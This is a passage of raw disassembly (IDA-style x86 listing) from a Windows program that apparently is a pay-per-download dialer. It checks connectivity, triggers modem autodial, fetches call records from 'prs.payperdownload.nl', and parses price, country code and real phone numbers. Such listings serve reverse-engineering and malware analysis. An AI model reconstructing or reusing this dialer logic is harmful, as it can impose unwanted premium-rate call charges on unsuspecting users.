lea esi, [ebx+0Ch]
mov [edx], eax
mov eax, [ebx+4]
mov [edx+4], eax
mov ecx, [ebx+8]
mov [edx+8], ecx
lea edi, [edx+0Ch]
mov ecx, 7
rep movsd
movsw
mov al, [ebx+2Ah]
mov [edx+2Ah], al
mov eax, edx
lea esp, [ebp-210h]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 0Ch
; ---------------------------------------------------------------------------
loc_40664B: ; CODE XREF: sub_406560+A1�j
mov ecx, [ebp+lpString]
mov esi, [ebp+arg_0]
push ebx ; int
push ecx ; lpString
mov ecx, dword_40FBC8
push esi ; int
call sub_40A170
lea esp, [ebp-210h]
mov eax, esi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 0Ch
sub_406560 endp
; =============== S U B R O U T I N E =======================================
; int __thiscall sub_406670(int,int,LPCWSTR lpString)
sub_406670 proc near ; CODE XREF: sub_406720+193�p
; sub_406720+2E7�p ...
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = byte ptr -4Ch
var_2E = byte ptr -2Eh
bstrString = dword ptr -2Ch
lpMem = dword ptr -28h
arg_0 = dword ptr 4
lpString = dword ptr 8
mov eax, [esp+lpString]
sub esp, 58h
push ebx
xor ebx, ebx
push esi
cmp eax, ebx
mov esi, ecx
jnz short loc_40669D
mov eax, [esp+60h+arg_0]
push eax
call sub_405140
push eax ; uID
push esi ; int
call sub_4055A0
add esp, 8
pop esi
pop ebx
add esp, 58h
retn 8
; ---------------------------------------------------------------------------
loc_40669D: ; CODE XREF: sub_406670+F�j
lea ecx, [esp+60h+var_58]
lea edx, [esp+60h+bstrString]
push ecx ; int
push eax ; lpString
push edx ; int
mov ecx, esi
mov [esp+6Ch+var_58], ebx
mov [esp+6Ch+var_54], ebx
mov [esp+6Ch+var_50], ebx
mov [esp+6Ch+var_4C], bl
mov [esp+6Ch+var_2E], bl
call sub_406560
mov ecx, eax
call sub_40A2D0
push eax ; arglist
push offset aS ; "%s"
push esi ; int
call sub_405640
mov eax, [esp+6Ch+lpMem]
add esp, 0Ch
cmp eax, ebx
jz short loc_4066EE
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [esp+60h+lpMem], ebx
loc_4066EE: ; CODE XREF: sub_406670+6F�j
mov eax, [esp+60h+bstrString]
mov esi, ds:SysFreeString
push eax ; bstrString
call esi ; SysFreeString
mov eax, [esp+60h+var_54]
cmp eax, ebx
jz short loc_406710
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [esp+60h+var_54], ebx
loc_406710: ; CODE XREF: sub_406670+91�j
mov ecx, [esp+60h+var_58]
push ecx ; bstrString
call esi ; SysFreeString
pop esi
pop ebx
add esp, 58h
retn 8
sub_406670 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __thiscall sub_406720(int,int,int,int,int)
sub_406720 proc near ; CODE XREF: sub_402180+142�p
lpString = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = byte ptr -78h
var_5A = byte ptr -5Ah
bstrString = dword ptr -58h
lpMem = dword ptr -54h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
sub esp, 88h
push ebx
push esi
mov esi, ecx
xor ebx, ebx
mov ecx, dword_40FBC8
mov [esp+90h+var_84], ebx
mov [esp+90h+var_80], ebx
mov [esp+90h+var_7C], ebx
mov [esp+90h+var_78], bl
mov [esp+90h+var_5A], bl
call sub_40A0B0
cmp eax, 0E10h
jle short loc_40678D
mov eax, [esi+4]
push 1 ; uIDEvent
push eax ; hWnd
call ds:KillTimer ; KillTimer
mov ecx, esi
call sub_407EC0
mov ecx, dword_40FBC8
push 0BB8h
call sub_409F90
mov ecx, esi
call sub_405180
mov eax, [esp+90h+var_80]
cmp eax, ebx
jz loc_406CB1
jmp loc_406CA4
; ---------------------------------------------------------------------------
loc_40678D: ; CODE XREF: sub_406720+30�j
mov eax, [esi+5Ch]
push ebp
cmp eax, 9 ; switch 10 cases
push edi ; arglist
ja loc_406C9A ; default
jmp ds:off_406CCC[eax*4] ; switch jump
loc_4067A2: ; DATA XREF: .text:off_406CCC�o
cmp ds:byte_40D718, bl ; jumptable 0040679B case 1
jz short loc_4067B5
mov edx, [esi+4]
push ebx ; nCmdShow
push edx ; hWnd
call ds:ShowWindow ; ShowWindow
loc_4067B5: ; CODE XREF: sub_406720+88�j
push 1F5h ; uID
push esi ; int
mov dword ptr [esi+5Ch], 2
call sub_4055A0
add esp, 8
mov ecx, esi
push 386h ; uID
push 1 ; nIDDlgItem
call sub_405680
mov ecx, dword_40FBC8
call sub_40A030
push 1FBh ; uID
push esi ; int
call sub_4055A0
add esp, 8
jmp loc_406C9A ; default
; ---------------------------------------------------------------------------
loc_4067F6: ; CODE XREF: sub_406720+7B�j
; DATA XREF: .text:off_406CCC�o
cmp ds:byte_40D718, bl ; jumptable 0040679B case 2
jz short loc_406809
mov eax, [esi+4]
push ebx ; nCmdShow
push eax ; hWnd
call ds:ShowWindow ; ShowWindow
loc_406809: ; CODE XREF: sub_406720+DC�j
mov ecx, dword_40FBC8
call sub_40A120
test eax, eax
jg loc_406C9A ; default
lea ecx, [esp+98h+lpString]
mov dword ptr [esi+5Ch], 5
push ecx
mov ecx, dword_40FBC8
call sub_409DA0
jmp short loc_4068A3
; ---------------------------------------------------------------------------
loc_406835: ; CODE XREF: sub_406720+7B�j
; DATA XREF: .text:off_406CCC�o
cmp ds:byte_40D718, bl ; jumptable 0040679B case 3
jz short loc_406848
mov edx, [esi+4]
push ebx ; nCmdShow
push edx ; hWnd
call ds:ShowWindow ; ShowWindow
loc_406848: ; CODE XREF: sub_406720+11B�j
push 386h ; uID
push 1 ; nIDDlgItem
mov ecx, esi
mov dword ptr [esi+5Ch], 4
call sub_405680
mov ecx, dword_40FBC8
push 0BB8h
call sub_409F90
jmp loc_406C9A ; default
; ---------------------------------------------------------------------------
loc_406872: ; CODE XREF: sub_406720+7B�j
; DATA XREF: .text:off_406CCC�o
cmp ds:byte_40D718, bl ; jumptable 0040679B case 4
jz short loc_406885
mov eax, [esi+4]
push ebx ; nCmdShow
push eax ; hWnd
call ds:ShowWindow ; ShowWindow
loc_406885: ; CODE XREF: sub_406720+158�j
lea ecx, [esp+98h+lpString]
push ecx
mov ecx, dword_40FBC8
call sub_409DA0
cmp eax, 2001h
jnz short loc_4068A3
mov dword ptr [esi+5Ch], 5
loc_4068A3: ; CODE XREF: sub_406720+113�j
; sub_406720+17A�j
mov ecx, [esp+98h+lpString]
cmp ecx, ebx
jz loc_406C9A ; default
push ecx ; lpString
push eax ; int
mov ecx, esi ; int
call sub_406670
jmp loc_406C9A ; default
; ---------------------------------------------------------------------------
loc_4068BD: ; CODE XREF: sub_406720+7B�j
; DATA XREF: .text:off_406CCC�o
cmp ds:byte_40D718, bl ; jumptable 0040679B case 5
jz short loc_4068D0
mov edx, [esi+4]
push ebx ; nCmdShow
push edx ; hWnd
call ds:ShowWindow ; ShowWindow
loc_4068D0: ; CODE XREF: sub_406720+1A3�j
mov dword ptr [esi+5Ch], 6
mov ecx, dword_40FBC8
call sub_4099D0
mov edi, eax
cmp edi, ebx
jz short loc_406931
lea eax, [esp+98h+var_84]
lea ecx, [esp+98h+bstrString]
push eax ; int
push edi ; lpString
push ecx ; int
mov ecx, esi
call sub_406560
mov ecx, eax
call sub_40A2D0
push eax
push edi ; arglist
push offset aUpdateentryDS ; "UpdateEntry: %d - %s"
push esi ; int
call sub_405640
mov eax, [esp+0A8h+lpMem]
add esp, 10h
cmp eax, ebx
jz short loc_406926
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [esp+98h+lpMem], ebx
loc_406926: ; CODE XREF: sub_406720+1F7�j
mov edx, [esp+98h+bstrString]
push edx ; bstrString
call ds:SysFreeString
loc_406931: ; CODE XREF: sub_406720+1C6�j
mov ecx, dword_40FBC8
call sub_409CE0
mov edi, eax
cmp edi, ebx
jz short loc_40699A
lea eax, [esp+98h+var_84]
lea ecx, [esp+98h+var_2C]
push eax ; int
push edi ; lpString
push ecx ; int
mov ecx, esi
mov dword ptr [esi+5Ch], 8
call sub_406560
mov ecx, eax
call sub_40A2D0
push eax
push edi ; arglist
push offset aDialDS ; "Dial: %d - %s"
push esi ; int
call sub_405640
mov eax, [esp+0A8h+var_28]
add esp, 10h
cmp eax, ebx
jz short loc_40698A
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [esp+98h+var_28], ebx
loc_40698A: ; CODE XREF: sub_406720+25B�j
mov edx, [esp+98h+var_2C]
push edx ; bstrString
call ds:SysFreeString
jmp loc_406C9A ; default
; ---------------------------------------------------------------------------
loc_40699A: ; CODE XREF: sub_406720+220�j
mov dword_40FBD0, 0Ah
jmp loc_406C9A ; default
; ---------------------------------------------------------------------------
loc_4069A9: ; CODE XREF: sub_406720+7B�j
; DATA XREF: .text:off_406CCC�o
mov al, ds:byte_40D718 ; jumptable 0040679B case 6
mov edi, ds:ShowWindow
cmp al, bl
jz short loc_4069BF
mov eax, [esi+4]
push ebx ; nCmdShow
push eax ; hWnd
call edi ; ShowWindow
loc_4069BF: ; CODE XREF: sub_406720+296�j
lea ecx, [esp+98h+lpString]
push ecx
mov ecx, dword_40FBC8
call sub_409DA0
mov ebp, eax
sub eax, 2000h
jz short loc_406A11
dec eax
jnz loc_406A7A
mov eax, dword_40FBD0
mov edx, eax
dec eax
test edx, edx
mov dword_40FBD0, eax
jg loc_406A7A
mov eax, [esp+98h+lpString]
mov ecx, esi ; int
push eax ; lpString
push ebp ; int
mov byte ptr [esi+55h], 1
mov dword ptr [esi+5Ch], 8
call sub_406670
jmp loc_406C9A ; default
; ---------------------------------------------------------------------------
loc_406A11: ; CODE XREF: sub_406720+2B6�j
push 387h ; uID
push 1 ; nIDDlgItem
mov ecx, esi
mov dword ptr [esi+5Ch], 7
call sub_405680
mov ecx, dword_40FBC8
call sub_4099D0
cmp ds:byte_40D718, bl
jnz short loc_406A41
mov eax, [esi+4]
push 2 ; nCmdShow
push eax ; hWnd
call edi ; ShowWindow
loc_406A41: ; CODE XREF: sub_406720+317�j
mov ecx, [esi+58h]
push ecx
mov ecx, esi
call sub_407820
push offset aXx ; "xx"
mov ecx, esi
call sub_407820
lea ecx, [esi+20h]
call sub_409400
push eax ; lpFile
mov ecx, esi
call sub_404FF0
mov edx, [esi+4]
push ebx ; lpTimerFunc
push 3E8h ; uElapse
push 1 ; nIDEvent
push edx ; hWnd
call ds:SetTimer ; SetTimer
loc_406A7A: ; CODE XREF: sub_406720+2B9�j
; sub_406720+2CE�j
mov eax, [esp+98h+lpString]
mov ecx, esi ; int
push eax ; lpString
push ebp ; int
call sub_406670
jmp loc_406C9A ; default
; ---------------------------------------------------------------------------
loc_406A8C: ; CODE XREF: sub_406720+7B�j
; DATA XREF: .text:off_406CCC�o
cmp ds:byte_40D718, bl ; jumptable 0040679B case 7
jz short loc_406A9F
mov ecx, [esi+4]
push ebx ; nCmdShow
push ecx ; hWnd
call ds:ShowWindow ; ShowWindow
loc_406A9F: ; CODE XREF: sub_406720+372�j
lea edx, [esp+98h+lpString]
mov byte ptr [esi+54h], 1
mov ecx, dword_40FBC8
push edx
call sub_409DA0
mov edi, eax
cmp edi, 2001h
jnz short loc_406AD6
mov eax, [esi+4]
push ebx ; lpTimerFunc
push 0FAh ; uElapse
push 1 ; nIDEvent
push eax ; hWnd
mov dword ptr [esi+5Ch], 8
call ds:SetTimer ; SetTimer
loc_406AD6: ; CODE XREF: sub_406720+39B�j
mov ecx, [esp+98h+lpString]
push ecx ; lpString
push edi ; int
mov ecx, esi ; int
call sub_406670
jmp loc_406C9A ; default
; ---------------------------------------------------------------------------
loc_406AE8: ; CODE XREF: sub_406720+7B�j
; DATA XREF: .text:off_406CCC�o
cmp ds:byte_40D718, bl ; jumptable 0040679B case 8
jz short loc_406AFB
mov edx, [esi+4]
push ebx ; nCmdShow
push edx ; hWnd
call ds:ShowWindow ; ShowWindow
loc_406AFB: ; CODE XREF: sub_406720+3CE�j
push 386h ; uID
push 1 ; nIDDlgItem
mov ecx, esi
mov dword ptr [esi+5Ch], 9
call sub_405680
mov ecx, dword_40FBC8
push 0BB8h
call sub_409F90
mov eax, [esi+4]
push ebx ; lpTimerFunc
push 0FAh ; uElapse
push 1 ; nIDEvent
push eax ; hWnd
call ds:SetTimer ; SetTimer
jmp loc_406C9A ; default
; ---------------------------------------------------------------------------
loc_406B37: ; CODE XREF: sub_406720+7B�j
; DATA XREF: .text:off_406CCC�o
cmp ds:byte_40D718, bl ; jumptable 0040679B case 9
jz short loc_406B4A
mov ecx, [esi+4]
push ebx ; nCmdShow
push ecx ; hWnd
call ds:ShowWindow ; ShowWindow
loc_406B4A: ; CODE XREF: sub_406720+41D�j
mov ecx, dword_40FBC8
lea edx, [esp+98h+lpString]
push edx
call sub_409DA0
cmp eax, 2001h
jnz short loc_406B64
mov [esi+5Ch], ebx
loc_406B64: ; CODE XREF: sub_406720+43F�j
mov ecx, [esp+98h+lpString]
push ecx ; lpString
push eax ; int
mov ecx, esi ; int
call sub_406670
jmp loc_406C9A ; default
; ---------------------------------------------------------------------------
loc_406B76: ; CODE XREF: sub_406720+7B�j
; DATA XREF: .text:off_406CCC�o
cmp [esi+54h], bl ; jumptable 0040679B case 0
jnz short loc_406BFA
cmp [esi+56h], bl
jnz short loc_406BFA
lea edi, [esi+20h]
push 2
mov ecx, edi
call sub_4092F0
mov ecx, dword_40FBC8
push eax ; lpString2
call sub_409C70
push 2
mov ecx, edi
call sub_409330
mov ecx, dword_40FBC8
push eax ; lpString2
call sub_409C90
push 2
mov ecx, edi
call sub_409370
mov ecx, dword_40FBC8
push eax ; lpString2
call sub_409C40
mov edx, [esi+4]
push ebx ; lParam
push ebx ; wParam
push 184h ; Msg
push 0CCh ; nIDDlgItem
push edx ; hDlg
mov dword ptr [esi+5Ch], 3
call ds:SendDlgItemMessageA ; SendDlgItemMessageA
mov eax, [esi+4]
push ebx ; lpTimerFunc
push 0FAh ; uElapse
push 1 ; nIDEvent
push eax ; hWnd
call ds:SetTimer ; SetTimer
mov byte ptr [esi+56h], 1
jmp loc_406C97
; ---------------------------------------------------------------------------
loc_406BFA: ; CODE XREF: sub_406720+459�j
; sub_406720+45E�j
mov ecx, [esi+4]
push 1 ; uIDEvent
push ecx ; hWnd
call ds:KillTimer ; KillTimer
push 385h ; uID
push 1 ; nIDDlgItem
mov ecx, esi
call sub_405680
mov ecx, dword_40FBC8
lea edi, [esi+20h]
call sub_40A0B0
mov ecx, edi
mov ebp, eax
call sub_409420
add ebp, eax
mov ecx, edi
push ebp
call sub_409410
mov ecx, edi
call sub_4092B0
push 1
mov ecx, edi
call sub_4092F0
mov ecx, dword_40FBC8
push eax ; lpString2
call sub_409C70
push 1
mov ecx, edi
call sub_409330
mov ecx, dword_40FBC8
push eax ; lpString2
call sub_409C90
push 1
mov ecx, edi
call sub_409370
mov ecx, dword_40FBC8
push eax ; lpString2
call sub_409C40
cmp ds:byte_40D718, bl
jz short loc_406C8B
mov edx, [esi+4]
push 5
push edx
jmp short loc_406C91
; ---------------------------------------------------------------------------
loc_406C8B: ; CODE XREF: sub_406720+561�j
mov eax, [esi+4]
push 9 ; nCmdShow
push eax ; hWnd
loc_406C91: ; CODE XREF: sub_406720+569�j
call ds:ShowWindow ; ShowWindow
loc_406C97: ; CODE XREF: sub_406720+4D5�j
mov [esi+55h], bl
loc_406C9A: ; CODE XREF: sub_406720+75�j
; sub_406720+D1�j ...
mov eax, [esp+98h+var_80] ; default
pop edi
cmp eax, ebx
pop ebp
jz short loc_406CB1
loc_406CA4: ; CODE XREF: sub_406720+68�j
push eax ; lpMem
call sub_40AF10
add esp, 4
mov [esp+90h+var_80], ebx
loc_406CB1: ; CODE XREF: sub_406720+62�j
; sub_406720+582�j
mov ecx, [esp+90h+var_84]
push ecx ; bstrString
call ds:SysFreeString
pop esi
xor eax, eax
pop ebx
add esp, 88h
retn 10h
sub_406720 endp
; ---------------------------------------------------------------------------
align 4
off_406CCC dd offset loc_406B76 ; DATA XREF: sub_406720+7B�r
dd offset loc_4067A2 ; jump table for switch statement
dd offset loc_4067F6
dd offset loc_406835
dd offset loc_406872
dd offset loc_4068BD
dd offset loc_4069A9
dd offset loc_406A8C
dd offset loc_406AE8
dd offset loc_406B37
align 10h
; =============== S U B R O U T I N E =======================================
sub_406D00 proc near ; CODE XREF: sub_402180+B6�p
var_4 = byte ptr -4
push ecx
push esi
mov esi, ecx
mov ecx, dword_40FBC8
test ecx, ecx
jz short loc_406D2F
lea eax, [esp+8+var_4]
push eax
call sub_409DA0
cmp eax, 2000h
jz short loc_406D41
mov ecx, dword_40FBC8
push 0BB8h
call sub_409F90
loc_406D2F: ; CODE XREF: sub_406D00+C�j
mov ecx, [esi+4]
push ecx ; hWnd
call ds:DestroyWindow ; DestroyWindow
push 0 ; nExitCode
call ds:PostQuitMessage ; PostQuitMessage
loc_406D41: ; CODE XREF: sub_406D00+1D�j
xor eax, eax
pop esi
pop ecx
retn 10h
sub_406D00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __thiscall sub_406D50(int,int,int,int,int)
sub_406D50 proc near ; CODE XREF: sub_402180+FD�p
String1 = dword ptr -200h
sub esp, 200h
push esi
push edi
mov edi, ds:SendDlgItemMessageA
mov esi, ecx
push 0 ; lParam
push 0 ; wParam
mov eax, [esi+4]
push 147h ; Msg
push 0C9h ; nIDDlgItem
push eax ; hDlg
call edi ; SendDlgItemMessageA
mov edx, [esi+4]
lea ecx, [esp+208h+String1]
push ecx ; lParam
push eax ; wParam
push 148h ; Msg
push 0C9h ; nIDDlgItem
push edx ; hDlg
call edi ; SendDlgItemMessageA
mov ecx, dword_40FBC8
lea eax, [esp+208h+String1]
push eax ; lpString1
call sub_4097E0
test eax, eax
jge short loc_406DDC
lea ecx, [esp+208h+String1]
push ecx ; arglist
push 1F4h ; uID
push esi ; int
call sub_4055A0
mov ecx, dword_40FBC8
add esp, 0Ch
call sub_409B80
mov edx, [esi+4]
push eax ; lParam
push 0 ; wParam
push 14Dh ; Msg
push 0C9h ; nIDDlgItem
push edx ; hDlg
call edi ; SendDlgItemMessageA
pop edi
xor eax, eax
pop esi
add esp, 200h
retn 10h
; ---------------------------------------------------------------------------
loc_406DDC: ; CODE XREF: sub_406D50+4C�j
mov ecx, dword_40FBC8
push eax
call sub_409720
pop edi
xor eax, eax
pop esi
add esp, 200h
retn 10h
sub_406D50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_406E00 proc near ; CODE XREF: sub_402180+186�p
String2 = byte ptr -0Ch
sub esp, 0Ch
lea eax, [esp+0Ch+String2]
push esi
mov esi, ecx
push 0Ah ; cchMax
push eax ; lpString
mov ecx, [esi+4]
push 0CEh ; nIDDlgItem
push ecx ; hDlg
call ds:GetDlgItemTextA ; GetDlgItemTextA
mov ecx, dword_40FBC8
lea edx, [esp+10h+String2]
push edx ; lpString2
call sub_409C20
mov al, [esi+4Eh]
test al, al
jnz short loc_406E3F
lea eax, [esp+10h+String2]
mov ecx, esi
push eax ; lpData
call sub_4084F0
loc_406E3F: ; CODE XREF: sub_406E00+31�j
xor eax, eax
pop esi
add esp, 0Ch
retn 10h
sub_406E00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_406E50 proc near ; CODE XREF: sub_402180+1C2�p
push 74h ; uID
call sub_405020
xor eax, eax
retn 10h
sub_406E50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406E60 proc near ; CODE XREF: sub_405C90+1AA�p
var_B10 = byte ptr -0B10h
String = byte ptr -310h
var_110 = byte ptr -110h
var_F0 = byte ptr -0F0h
var_D0 = byte ptr -0D0h
var_B0 = byte ptr -0B0h
String2 = byte ptr -9Ch
bstrString = dword ptr -88h
lpMem = dword ptr -84h
var_80 = dword ptr -80h
var_7C = byte ptr -7Ch
var_5E = byte ptr -5Eh
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
dwDisposition = dword ptr -44h
var_40 = byte ptr -40h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
cbData = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
hKey = dword ptr -10h
var_A = byte ptr -0Ah
var_9 = byte ptr -9
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 0B10h
push ebx
push esi
mov esi, ds:InternetCheckConnectionA
push edi
push 0
mov edi, ecx
push 1
push offset aHttpPrs_payper ; "http://prs.payperdownload.nl"
mov [ebp+var_54], edi
call esi ; InternetCheckConnectionA
test eax, eax
jnz short loc_406EAE
mov al, [edi+54h]
test al, al
jnz loc_407804
push 0
push 2
call ds:InternetAutodial ; InternetAutodial
push 0
push 1
push offset aHttpPrs_payper ; "http://prs.payperdownload.nl"
call esi ; InternetCheckConnectionA
test eax, eax
jz loc_407804
loc_406EAE: ; CODE XREF: sub_406E60+24�j
push 0
push 0
push 0
push 0
push offset aDel ; "del"
call ds:InternetOpenA ; InternetOpenA
test eax, eax
mov [ebp+var_58], eax
jz loc_407804
push 0
push 0
push 0
push 0
push offset aHttpPrs_payp_0 ; "http://prs.payperdownload.nl/radius/dia"...
push eax
call ds:InternetOpenUrlA ; InternetOpenUrlA
test eax, eax
mov [ebp+var_5C], eax
jz loc_4077E6
lea ecx, [ebp+var_50]
lea edx, [ebp+var_B10]
push ecx
push 800h
push edx
push eax
mov esi, 0FFFFFFFDh
call ds:InternetReadFile ; InternetReadFile
test eax, eax
jz loc_4077C3
mov ecx, [ebp+var_50]
test ecx, ecx
jz loc_4077C3
xor eax, eax
xor esi, esi
xor edx, edx
cmp ecx, eax
mov [ebp+ecx+var_B10], 0
mov [ebp+var_8], 0
mov [ebp+var_7], 0
mov [ebp+var_9], 0
mov [ebp+var_12], 0
mov [ebp+var_11], 0
mov [ebp+var_14], 0
mov [ebp+var_13], 0
mov [ebp+var_1], 0
mov [ebp+var_3], 0
mov [ebp+var_2], 0
mov [ebp+var_5], 0
mov [ebp+var_4], 0
mov [ebp+var_6], 0
mov [ebp+var_A], 0
mov [ebp+hKey], eax
mov [ebp+var_38], eax
mov [ebp+var_4C], eax
mov [ebp+var_2C], eax
mov [ebp+cbData], eax
mov [ebp+var_24], eax
mov [ebp+var_18], eax
mov [ebp+var_1C], edx
mov [ebp+var_28], eax
mov [ebp+dwDisposition], eax
mov [ebp+var_48], eax
mov [ebp+var_34], eax
jbe loc_40723C
mov ebx, 1
lea edi, [ebp+var_B10]
loc_406F97: ; CODE XREF: sub_406E60+3D0�j
mov al, [ebp+var_A]
test al, al
jnz loc_407236
movsx eax, byte ptr [edi]
sub eax, 22h
jz loc_40716C
sub eax, 1Ah
jz loc_407163
sub eax, 2
jz loc_40713B
cmp ebx, 7D1h
jg loc_407549
mov al, [ebp+var_9]
test al, al
jz short loc_40703C
push 0Bh
push edi
push offset aCallrecords ; "callrecords"
call sub_40B490
add esp, 0Ch
test eax, eax
jnz short loc_406FF9
add esi, 0Ah
add edi, 0Ah
mov [ebp+var_8], 1
add ebx, 0Ah
jmp loc_407228
; ---------------------------------------------------------------------------
loc_406FF9: ; CODE XREF: sub_406E60+185�j
push 0Ch
push edi
push offset aCallrecords_0 ; "/callrecords"
call sub_40B490
add esp, 0Ch
test eax, eax
jnz short loc_407016
mov [ebp+var_A], 1
jmp loc_407228
; ---------------------------------------------------------------------------
loc_407016: ; CODE XREF: sub_406E60+1AB�j
push 4
push edi
push offset aCall ; "call"
call sub_40B490
add esp, 0Ch
test eax, eax
jnz short loc_40703C
add esi, 3
add edi, 3
mov [ebp+var_7], 1
add ebx, 3
jmp loc_407228
; ---------------------------------------------------------------------------
loc_40703C: ; CODE XREF: sub_406E60+171�j
; sub_406E60+1C8�j
mov al, [ebp+var_7]
test al, al
jz loc_407228
push 0Ah
push edi
push offset aRealnumber ; "realnumber"
call sub_40B490
add esp, 0Ch
test eax, eax
jnz short loc_407095
mov [ebp+var_1], al
mov [ebp+var_3], al
mov [ebp+var_2], al
mov [ebp+var_5], al
mov al, [ebp+var_11]
test al, al
jnz short loc_407074
mov [ebp+var_2], 1
jmp short loc_40707F
; ---------------------------------------------------------------------------
loc_407074: ; CODE XREF: sub_406E60+20C�j
mov al, [ebp+var_14]
test al, al
jnz short loc_40707F
mov [ebp+var_5], 1
loc_40707F: ; CODE XREF: sub_406E60+212�j
; sub_406E60+219�j
add esi, 9
add edi, 9
mov [ebp+var_4], 0
mov [ebp+var_6], 0
add ebx, 9
jmp loc_407228
; ---------------------------------------------------------------------------
loc_407095: ; CODE XREF: sub_406E60+1F9�j
push 5
push edi
push offset aPrice ; "price"
call sub_40B490
add esp, 0Ch
test eax, eax
jnz short loc_4070E6
mov [ebp+var_1], al
mov [ebp+var_3], al
mov [ebp+var_2], al
mov [ebp+var_5], al
mov [ebp+var_4], al
mov [ebp+var_6], al
mov al, [ebp+var_13]
test al, al
jnz short loc_4070D4
add esi, 4
add edi, 4
mov [ebp+var_4], 1
add ebx, 4
jmp loc_407228
; ---------------------------------------------------------------------------
loc_4070D4: ; CODE XREF: sub_406E60+260�j
add esi, 4
add edi, 4
mov [ebp+var_6], 1
add ebx, 4
jmp loc_407228
; ---------------------------------------------------------------------------
loc_4070E6: ; CODE XREF: sub_406E60+247�j
push 0Bh
push edi
push offset aCountrycode ; "countrycode"
call sub_40B490
add esp, 0Ch
test eax, eax
jnz loc_407228
mov [ebp+var_1], al
mov [ebp+var_3], al
mov [ebp+var_2], al
mov [ebp+var_5], al
mov [ebp+var_4], al
mov [ebp+var_6], al
mov al, [ebp+var_12]
test al, al
jnz short loc_407129
add esi, 4
add edi, 4
mov [ebp+var_1], 1
add ebx, 4
jmp loc_407228
; ---------------------------------------------------------------------------
loc_407129: ; CODE XREF: sub_406E60+2B5�j
add esi, 4
add edi, 4
mov [ebp+var_3], 1
add ebx, 4
jmp loc_407228
; ---------------------------------------------------------------------------
loc_40713B: ; CODE XREF: sub_406E60+15A�j
mov al, [ebp+var_8]
test al, al
jz short loc_40714F
mov [ebp+var_8], 0
mov [ebp+var_9], 0
jmp loc_407228
; ---------------------------------------------------------------------------
loc_40714F: ; CODE XREF: sub_406E60+2E0�j
mov al, [ebp+var_7]
test al, al
jz short loc_40715A
mov [ebp+var_7], 0
loc_40715A: ; CODE XREF: sub_406E60+2F4�j
mov [ebp+var_9], 0
jmp loc_407228
; ---------------------------------------------------------------------------
loc_407163: ; CODE XREF: sub_406E60+151�j
mov [ebp+var_9], 1
jmp loc_407228
; ---------------------------------------------------------------------------
loc_40716C: ; CODE XREF: sub_406E60+148�j
mov al, [ebp+var_2]
test al, al
jz short loc_407192
mov eax, [ebp+cbData]
test eax, eax
jle short loc_40718A
mov [ebp+var_2], 0
mov [ebp+var_11], 1
mov [ebp+var_24], esi
jmp loc_407228
; ---------------------------------------------------------------------------
loc_40718A: ; CODE XREF: sub_406E60+318�j
mov [ebp+cbData], ebx
jmp loc_407228
; ---------------------------------------------------------------------------
loc_407192: ; CODE XREF: sub_406E60+311�j
mov al, [ebp+var_5]
test al, al
jz short loc_4071B2
mov eax, [ebp+var_18]
test eax, eax
jle short loc_4071AD
mov [ebp+var_5], 0
mov [ebp+var_14], 1
mov [ebp+var_1C], esi
jmp short loc_407228
; ---------------------------------------------------------------------------
loc_4071AD: ; CODE XREF: sub_406E60+33E�j
mov [ebp+var_18], ebx
jmp short loc_407228
; ---------------------------------------------------------------------------
loc_4071B2: ; CODE XREF: sub_406E60+337�j
mov al, [ebp+var_4]
test al, al
jz short loc_4071D2
mov eax, [ebp+var_28]
test eax, eax
jle short loc_4071CD
mov [ebp+var_4], 0
mov [ebp+var_13], 1
mov [ebp+dwDisposition], esi
jmp short loc_407228
; ---------------------------------------------------------------------------
loc_4071CD: ; CODE XREF: sub_406E60+35E�j
mov [ebp+var_28], ebx
jmp short loc_407228
; ---------------------------------------------------------------------------
loc_4071D2: ; CODE XREF: sub_406E60+357�j
mov al, [ebp+var_6]
test al, al
jz short loc_4071EE
mov eax, [ebp+var_48]
test eax, eax
jle short loc_4071E9
mov [ebp+var_6], 0
mov [ebp+var_34], esi
jmp short loc_407228
; ---------------------------------------------------------------------------
loc_4071E9: ; CODE XREF: sub_406E60+37E�j
mov [ebp+var_48], ebx
jmp short loc_407228
; ---------------------------------------------------------------------------
loc_4071EE: ; CODE XREF: sub_406E60+377�j
mov al, [ebp+var_1]
test al, al
jz short loc_40720E
mov eax, [ebp+hKey]
test eax, eax
jle short loc_407209
mov [ebp+var_1], 0
mov [ebp+var_12], 1
mov [ebp+var_38], esi
jmp short loc_407228
; ---------------------------------------------------------------------------
loc_407209: ; CODE XREF: sub_406E60+39A�j
mov [ebp+hKey], ebx
jmp short loc_407228
; ---------------------------------------------------------------------------
loc_40720E: ; CODE XREF: sub_406E60+393�j
mov al, [ebp+var_3]
test al, al
jz short loc_407228
mov eax, [ebp+var_4C]
test eax, eax
jle short loc_407225
mov [ebp+var_3], 0
mov [ebp+var_2C], esi
jmp short loc_407228
; ---------------------------------------------------------------------------
